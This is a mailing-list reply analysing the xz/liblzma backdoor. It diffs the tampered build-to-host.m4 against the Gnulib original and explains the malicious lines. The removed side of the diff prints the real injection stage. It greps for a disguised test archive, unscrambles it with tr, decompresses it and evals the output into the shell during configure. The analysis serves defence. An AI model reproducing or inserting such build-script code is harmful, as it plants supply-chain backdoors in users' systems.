Re: backdoor in upstream xz/liblzma leading to ssh server compromise

[Collin Funk <collin.funk1 () gmail com>]

I am not subscribed to this list, sorry for the missing Reply-To.

It looks like they copied the build-to-host.m4 file from Gnulib and
made malicious modifications, hoping no one would notice [1].
Hopefully this diff will help lead anyone investigating it in the
correct direction:

$ diff -u m4/build-to-host.m4 $GNULIB_REFDIR/m4/build-to-host.m4 
--- m4/build-to-host.m4 2024-03-29 21:52:50.956049825 -0700
+++ /home/collin/.local/src/gnulib/m4/build-to-host.m4  2024-03-29 22:37:06.424791077 -0700
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 30
+# build-to-host.m4 serial 3
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,7 +37,6 @@
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
-  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -59,40 +58,14 @@
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
-  if test "x$gl_am_configmake" != "x"; then
-    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
-  else
-    gl_[$1]_config=''
-  fi
-  _LT_TAGDECL([], [gl_path_map], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
-  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
-  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
-
-  dnl If the host conversion code has been placed in $gl_config_gt,
-  dnl instead of duplicating it all over again into config.status,
-  dnl then we will have config.status run $gl_config_gt later, so it
-  dnl needs to know what name is stored there:
-  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval 
\$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
-  dnl Search for Automake-defined pkg* macros, in the order
-  dnl listed in the Automake 1.10a+ documentation.
-  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
-  if test -n "$gl_am_configmake"; then
-    HAVE_PKG_CONFIGMAKE=1
-  else
-    HAVE_PKG_CONFIGMAKE=0
-  fi
-
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
-  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl


It is pretty clear that this line:

   gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

is checking for and saving 'tests/files/bad-3-corrupt_lzma2.xz'.

I don't think HAVE_PKG_CONFIGMAKE is used anywhere but I could be
missing something.

The '[$1]' in variable names seems to expand to 'locale'. See these
lines from ./configure:

gl_[$1]_prefix
gl_[$1]_config
gl_config_gt="eval \$gl_localedir_config"
gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"

Hopefully that can help someone who is more versed in Autoconf and m4.
Thanks for the work testing and discovering this.

[1] https://git.savannah.gnu.org/cgit/gnulib.git/tree/m4/build-to-host.m4

Collin